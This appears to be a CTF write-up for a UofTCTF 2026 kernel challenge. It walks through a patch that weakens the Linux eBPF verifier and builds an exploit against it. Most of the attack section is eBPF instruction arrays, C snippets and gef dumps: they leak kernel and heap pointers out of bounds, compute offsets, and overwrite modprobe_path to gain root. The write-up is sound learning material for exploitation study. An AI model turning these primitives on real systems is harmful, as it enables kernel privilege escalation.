Extended-eBPF Writeup UofTCTF 2026

Table of Contents

Index

  1. Patch Analysis
  2. Exploit Plan
  3. Exploit Overview
  4. Conclusion

This write-up will discuss the extended-eBPF challenge presented in uoftctf2026. The challenge appears as a classic kernel pwn challenge with the following files:

bzImage
chall.patch
challenge.yml
initramfs.cpio.gz
start-qemu.sh
startup.args

kernel version : 6.12.47

PATCH ANALYSIS

diff --git a/kernel/bpf/verifier.c b/kernel/bpf/verifier.c
index 24ae8f33e5d7..e5641845ecc0 100644
--- a/kernel/bpf/verifier.c
+++ b/kernel/bpf/verifier.c
@@ -13030,7 +13030,7 @@ static int retrieve_ptr_limit(const struct bpf_reg_state *ptr_reg,
 static bool can_skip_alu_sanitation(const struct bpf_verifier_env *env,
 				    const struct bpf_insn *insn)
 {
-	return env->bypass_spec_v1 || BPF_SRC(insn->code) == BPF_K;
+	return true;
 }
 
 static int update_alu_sanitation_state(struct bpf_insn_aux_data *aux,
@@ -14108,7 +14108,7 @@ static bool is_safe_to_compute_dst_reg_range(struct bpf_insn *insn,
 	case BPF_LSH:
 	case BPF_RSH:
 	case BPF_ARSH:
-		return (src_is_const && src_reg->umax_value < insn_bitness);
+		return (src_reg->umax_value < insn_bitness);
 	default:
 		return false;
 	}

As we can see, the patch is very short. Two lines are commented out which respectively:
Disable ALU sanitization: the function can_skip_alu_sanitation always returns true regardless of the result of the check. This means that at runtime there will be no checks for out-of-bounds operations.
The second part of the patch allows left shift, right shift, and arithmetic right shift operations even when the shift amount is not a constant value. The src_is_const check is removed.
What does the second part imply?
It implies that if we manage to trick the verifier using values stored inside a map, it will always consider the minimum possible value (https://elixir.bootlin.com/linux/v6.12.47/source/kernel/bpf/verifier.c#L13956).

normal eBPF:

r1 « 2 ✅
r1 « 1 ✅
r1 « r0 ❌

patched eBPF:

r1 « 2 ✅
r1 « 1 ✅
r1 « r0 ✅

example of how to exploit the bug.

not patched :

REG = 1
1 << 0 = 1
1 - 1 = 0

REG == 0

run time :

  REG = 1
  1 << 1 = 2
  1 - 1 = 0

  REG == 1

EXPLOIT PLAN

The exploit is divided into two eBPF programs: The first one allows us to leak a heap pointer that points to itself. This pointer is very important because, being at a fixed offset, it enables us to locate the address of our map and then leak a kernel pointer, which in turn allows us to recover the kernel base address. The second program allows us to overwrite the modprobe_path variable and ultimately read the flag.

EXPLOIT OVERVIEW

first code leak map and kernel address

int map_fd = create_map(); 
uint64_t value = 1;
update_map(map_fd, 0, &value, BPF_ANY);
value = 0xcafebabe;
update_map(map_fd, 1, &value, BPF_ANY);
value = 0xdeadbeef;
update_map(map_fd, 2, &value, BPF_ANY);

First of all, we obviously create a map with 4 entries of type uint64_t, so each value is 8 bytes. Then we update the map values by inserting: the value 1 at position 0,
the value 0xcafebabe at position 1. the value 0xdeadbeef at position 2. The value 1 at position 0 will later turn out to be very useful.
On the other hand, 0xdeadbeef and 0xcafebabe were added by me to make it easier to identify the map during the exploit debugging phase.

Command used to locate the map:

gef> search-pattern 0x00000000cafebabe
[+] Searching for '\xbe\xba\xfe\xca\x00\x00\x00\x00' in whole memory
[+] In (0xffffa014c1400000-0xffffa014c2e00000 [rw-] (0x1a00000 bytes)
  0xffffa014c1cd0f00:    be ba fe ca 00 00 00 00  ef be ad de 00 00 00 00    | 

The functions create_map and update_map were copied from a blog, but what they do is simply create a union bpf_attr structure, populate fields such as max_entries, value_size, map_type, etc., and then perform the corresponding syscall.

Now we get to the interesting part: the first BPF program.


struct bpf_insn ops[] = {
    BPF_LD_MAP_FD(BPF_REG_1, map_fd), 
    BPF_MOV64_IMM(BPF_REG_2 , 0),     
    BPF_STX_MEM(BPF_DW, BPF_REG_10, BPF_REG_2, -0x8), 
    BPF_MOV64_REG(BPF_REG_2 , BPF_REG_10), 
    BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -0x8),  
    BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem), 
    BPF_JMP_IMM(BPF_JEQ, BPF_REG_0, 0, 36), 
    BPF_LDX_MEM(BPF_DW, BPF_REG_6, BPF_REG_0 , 0),    
    BPF_JMP_IMM(BPF_JGE, BPF_REG_6, 2, 34), 
    BPF_MOV64_IMM(BPF_REG_7, 1),  
    BPF_ALU64_REG(BPF_LSH, BPF_REG_7 , BPF_REG_6), 
    BPF_ALU64_IMM(BPF_SUB, BPF_REG_7, 1), 

As we can see, the initial part of the code prepares the registers and the environment in order to perform a map_lookup, so that we can read the values stored in the map.
To properly understand how this works, we first need to know that eBPF registers have specific roles: r0 stores the return value of the currently executed function, or the result of a helper call.
r1 to r5 are equivalent to argument registers in a calling convention.
r6 to r9 are callee-saved registers, typically used as temporary pointers.
r10 points to the eBPF stack. The eBPF stack is usually accessed using negative offsets.
So, as a first step, we set up:

r0 -> map fd 
r2 -> point to the first value of the map and we will set this to 0

as we can see from https://elixir.bootlin.com/linux/v6.12.47/source/include/uapi/linux/bpf.h#L1849 :

 void *bpf_map_lookup_elem(struct bpf_map *map, const void *key)
 	Description
 		Perform a lookup in *map* for an entry associated to *key*.
 	Return
 		Map value associated to *key*, or **NULL** if no entry was
 		found.

The bpf_map_lookup_elem helper expects two parameters: a pointer to the map and a pointer to the key. In order to obtain these two pointers, we use the following trick:

save the frame pointer in the r2 register 
sub 8 to r2 -> (frame pointer - 8)

In this way, we set r2 = &key and r1 = fd, and we can then invoke:
BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem)

At this point, we only need to exploit the vulnerability and go out of bounds.

  BPF_JMP_IMM(BPF_JEQ, BPF_REG_0, 0, 36), 
  BPF_LDX_MEM(BPF_DW, BPF_REG_6, BPF_REG_0 , 0),

  BPF_JMP_IMM(BPF_JGE, BPF_REG_6, 2, 34),
  BPF_MOV64_IMM(BPF_REG_7, 1), 
  BPF_ALU64_REG(BPF_LSH, BPF_REG_7 , BPF_REG_6),

  BPF_ALU64_IMM(BPF_SUB, BPF_REG_7, 1),  

The first operation performs a jump if equal: if r0 is NULL, it jumps 36 instructions forward (to exit). Otherwise, it dereferences the map pointer and stores the result in r6.
Then we perform a jump if r6 is greater than or equal to 2; in this case, it narrows the range.

  BPF_MOV64_IMM(BPF_REG_7, 1),  
  BPF_ALU64_REG(BPF_LSH, BPF_REG_7 , BPF_REG_6), 

These two operations are extremely important because they allow us to go out of bounds. Here is what happens:

r7 -> 1 
r7 << r6
verifier :
1 << 0 ----> 1
exploit 
1 << 1 ----> 2

At this point, we just need to do:

  BPF_ALU64_IMM(BPF_SUB, BPF_REG_7, 1),

  BPF_MOV64_REG(BPF_REG_8,BPF_REG_7),
  BPF_MOV64_REG(BPF_REG_1,BPF_REG_0),

  BPF_ALU64_IMM(BPF_MUL, BPF_REG_8, -0xf8), 
  BPF_ALU64_IMM(BPF_MUL, BPF_REG_7, -0x88),

  BPF_ALU64_REG(BPF_ADD, BPF_REG_0 , BPF_REG_8),
  BPF_LDX_MEM(BPF_DW, BPF_REG_5, BPF_REG_0, 0),
  BPF_ALU64_REG(BPF_ADD, BPF_REG_1 , BPF_REG_7),
  BPF_LDX_MEM(BPF_DW, BPF_REG_6, BPF_REG_1, 0),
verifier 
r7 = 1
1-1 = 0
exploit
r7 = 2 
2-1 = 1 

Several mov instructions are executed because I need to leak two registers and it is convenient to preserve the value of the “bugged” register into another register.

Finally, a series of multiplications are performed, which will allow us to go out of bounds from the map.

verifier :
r7 = 0
0*(-0xf8)  ---> 0

exploit :
r7 = 1
1*(-0xf8)  ---> -0xf8

Why these magic values (0xf8, 0x88)?

0xffffa000c13ceef8 -> ptr my map 

gef> x/20gx 0xffffa000c13ceef8-0xf8
0xffffa000c13cee00:	0xffffffffab41d9a0	0x0000000000000000
0xffffa000c13cee10:	0x0000000400000002	0x0000000300000008
0xffffa000c13cee20:	0x0000000000000000	0x0000000100000000
0xffffa000c13cee30:	0x0000000000000000	0x00000000ffffffff
0xffffa000c13cee40:	0x0000000000000000	0x0000000000000000
0xffffa000c13cee50:	0x0000000000000000	0x0000000000000000
0xffffa000c13cee60:	0x0000000000000000	0x0000000000000000
0xffffa000c13cee70:	0xffffa000c13cee70	0xffffa000c13cee70
0xffffa000c13cee80:	0x0000000000000002	0x0000000000000001
0xffffa000c13cee90:	0x0000000000000000	0x0000000000000000

As we can see, we obtain both a kernel pointer and a heap pointer that points to itself. The latter is extremely important for leaking the map. These two pointers correspond exactly to the following structure: https://elixir.bootlin.com/linux/v6.12.47/source/include/linux/bpf.h#L287
Finally, this portion of code dereferences r0 (which points to bpf_map_ops) and stores the value in r5, and dereferences r1 (the heap pointer) and stores the value in r6.

  BPF_MOV64_IMM(BPF_REG_0, 0),       
  BPF_LD_MAP_FD(BPF_REG_1, map_fd),
  BPF_MOV64_IMM(BPF_REG_2, 0x0), 
  BPF_STX_MEM(BPF_DW, BPF_REG_10 , BPF_REG_2, -0x8), 
  BPF_MOV64_REG(BPF_REG_2, BPF_REG_10), 
  BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -0x8), 
  BPF_STX_MEM(BPF_DW, BPF_REG_10, BPF_REG_5, -0x10), 
  BPF_MOV64_REG(BPF_REG_3, BPF_REG_10), 
  BPF_ALU64_IMM(BPF_ADD, BPF_REG_3, -0x10),

  BPF_MOV64_IMM(BPF_REG_4, BPF_ANY), 
  BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_update_elem), 

The last missing part of the first eBPF program that creates the leak is calling map_update_elem, setting all the correct parameters and values so that we can update the map with our leaked pointers. But which values do we need to set?

As always, the answer comes from Bootlin 🙂

 /* 
  long bpf_map_update_elem(struct bpf_map *map, const void *key, const void *value, u64 flags)
  	Description
  		Add or update the value of the entry associated to *key* in
  		*map* with *value*. *flags* is one of:
 
  		**BPF_NOEXIST**
  			The entry for *key* must not exist in the map.
  		**BPF_EXIST**
  			The entry for *key* must already exist in the map.
  		**BPF_ANY**
  			No condition on the existence of the entry for *key*.
 
  		Flag value **BPF_NOEXIST** cannot be used for maps of types
  		**BPF_MAP_TYPE_ARRAY** or **BPF_MAP_TYPE_PERCPU_ARRAY**  (all
  		elements always exist), the helper would return an error.
  	Return
  		0 on success, or a negative error in case of failure.
      */

So the registers must be set as follows:

  • r0 -> 0
  • r1 -> struct bpf_map *map
  • r2 -> const void *key
  • r3 -> void *value
  • r4 -> u64 flags

There is nothing particularly complicated in this portion of the code, except that we must reuse the previous trick: every time we want to store an element in the map at index x, we must save the value x on the stack and then pass a pointer to that stack value as the key argument. Finally, we call exit. At the end of this eBPF program, the map will have the following layout:

gef> x/20gx 0xffffa000c13ceef8
0xffffa000c13ceef8:	0xffffffffab41d9a0	0xffffa000c13cee70
0xffffa000c13cef08:	0x00000000deadbeef	0x0000000000000000

And we can go and run a lookup_map and save the values ​​and calculate the bases.

int prog_fd = create_prog(ops, sizeof(ops) / sizeof(struct bpf_insn));
uint64_t leak_kernel=0,leak_map=0;
int rc = lookup_map(map_fd, 0, &leak_kernel);
rc = lookup_map(map_fd, 1, &leak_map);


uint64_t kbase = leak_kernel -0x1d9a0;
uint64_t modprobe_path = kbase + 0x4be1e0;
uint64_t mymap = leak_map + 0x88;
uint64_t distance = modprobe_path - mymap;

printf("[*] kernel leak %lx: \n" , leak_kernel);
printf("[*] kernel base %lx \n\n" ,kbase);
printf("[*] map leak %lx \n" , leak_map);
printf("[*] map  %lx \n\n" , mymap);

printf("[*] distance  (modprobe_path - mymap) %lx \n" , distance);
printf("[*] modprobe_path %lx \n\n\n" ,modprobe_path);

second code overwrite modprobe_path

In this section we will analyze the second eBPF program that will allow us to overwrite the modprobe_path variable and read the flag.
Before analyzing the exploit itself, I think it’s useful to understand a few key concepts.
Difference Between Scalar and Pointer In eBPF, a register is not just a number — it also has a type that is symbolically tracked by the verifier. In this case, the types we care about are the following:

  • SCALAR_VALUE: A scalar value is simply a number without any address meaning. It can be: a value read from memory, the result of an arithmetic operation, a constant. Example: BPF_MOV64_IMM(BPF_REG_0, 5); What eBPF does is track a umin/umax range, representing the minimum and maximum possible value the scalar can assume.

  • PTR_(pointer_type): In eBPF, a pointer is not just a generic number. It is a register representing a memory address tracked by the verifier. There are many pointer types, for example: PTR_TO_MAP_VALUE → map value, PTR_TO_CTX → program context, PTR_TO_STACK → eBPF stack, etc.

struct bpf_insn ops2[] = {
    BPF_LD_MAP_FD(BPF_REG_1, map_fd),
    BPF_MOV64_IMM(BPF_REG_2 , 0), 
    BPF_STX_MEM(BPF_DW, BPF_REG_10, BPF_REG_2, -0x8), 
    BPF_MOV64_REG(BPF_REG_2 , BPF_REG_10), 
    BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -0x8), 
    BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem), /
    BPF_JMP_IMM(BPF_JEQ, BPF_REG_0, 0, 14), 
    BPF_LDX_MEM(BPF_DW, BPF_REG_6, BPF_REG_0 , 0),
    BPF_JMP_IMM(BPF_JGE, BPF_REG_6, 2, 12), /
    BPF_MOV64_IMM(BPF_REG_7, 1), 
    BPF_ALU64_REG(BPF_LSH, BPF_REG_7 , BPF_REG_6),
    BPF_ALU64_IMM(BPF_SUB, BPF_REG_7, 1),  
    BPF_MOV64_REG(BPF_REG_8,BPF_REG_7),
    BPF_MOV64_REG(BPF_REG_1,BPF_REG_0),

This is the first part of the exploit where I copied the setup phase and the creation of the corrupted value (verifier register = 0, real register = 1). If this is not clear, you can find it in the previous section about the initial map leak and kernel address disclosure, here.

    BPF_LD_IMM64(BPF_REG_6, 0x782f706d742f),
    BPF_LD_IMM64(BPF_REG_4, distance),  
    BPF_ALU64_REG(BPF_MUL, BPF_REG_4 , BPF_REG_7),
    BPF_ALU64_REG(BPF_ADD, BPF_REG_1 , BPF_REG_4),
    BPF_STX_MEM(BPF_DW, BPF_REG_1, BPF_REG_6 ,0),
    BPF_MOV64_IMM(BPF_REG_0, 0),
    BPF_JMP_IMM(BPF_JEQ, BPF_REG_0 , 0, 0),
    BPF_MOV64_IMM(BPF_REG_0 , 0x0),
    BPF_EXIT_INSN()
}

This is the code that allows us to overwrite modprobe_path. There is nothing particularly complex about it, the challenging part is satisfying the verifier by inserting the required values.
he first operation we perform is a BPF_LD_IMM64 loading the value: 0x782f706d742f at first glance, this looks like a random value, but it is actually the path "x/pmt/" encoded in little-endian form, a very important detail is that we must use BPF_LD_IMM64 for this load, because:

  • BPF_LD_IMM64 : Loads a full 64-bit immediate value (occupies two instructions).
  • BPF_MOV64_IMM : Loads a 32-bit immediate value (sign-extended to 64 bits).

Next, we load into r4 the offset: modprobe_path - map.
Then the “magic” that tricks the verifier happens: we multiply r4 (which contains modprobe_path - map) by the value in r7.

verifier :  
r4 -> modprobe_path - map
r7 -> 0 
result -> r4 * r7 -> 0

exploit : 
r4 -> modprobe_path - map
r7 -> 1 
result -> r4 * r7 -> r4

At this point we add the value of the map to r4 as follows:

verifier :  
r4 -> 0
r1 -> map 
result r1+r4 -> map 
exploit : 
r4 -> modprobe_path - map
r1 -> map
result -> r1 + r4-> modprobe_path

It is very important to use BPF_ALU64_REG and not BPF_ALU64_IMM because IMM represents a compile-time constant, while REG represents a runtime value. This is what allows us to trick the verifier.
The reason we initially assign to the register the difference between modprobe_path and the map is that, after we deceive the verifier into believing the register value is 0, we will only need to add back the map value. At that point, performing an stx will not cause any issues for the verifier because it believes we are still operating within our own map.
In reality, however, the pointer will resolve to modprobe_path, allowing us to overwrite it while the verifier thinks we are writing inside a legitimate map value.

Full exploit

solve img

Conclusion

Since this was my first eBPF challenge, I wasn’t able to solve it during the CTF. However, I found the challenge very interesting, and it motivated me to learn a lot more about eBPF. Thanks to Markx86 for the help :) Any kind of feedback or discussion about what I’ve written is more than welcome, feel free to reach out.

Ferro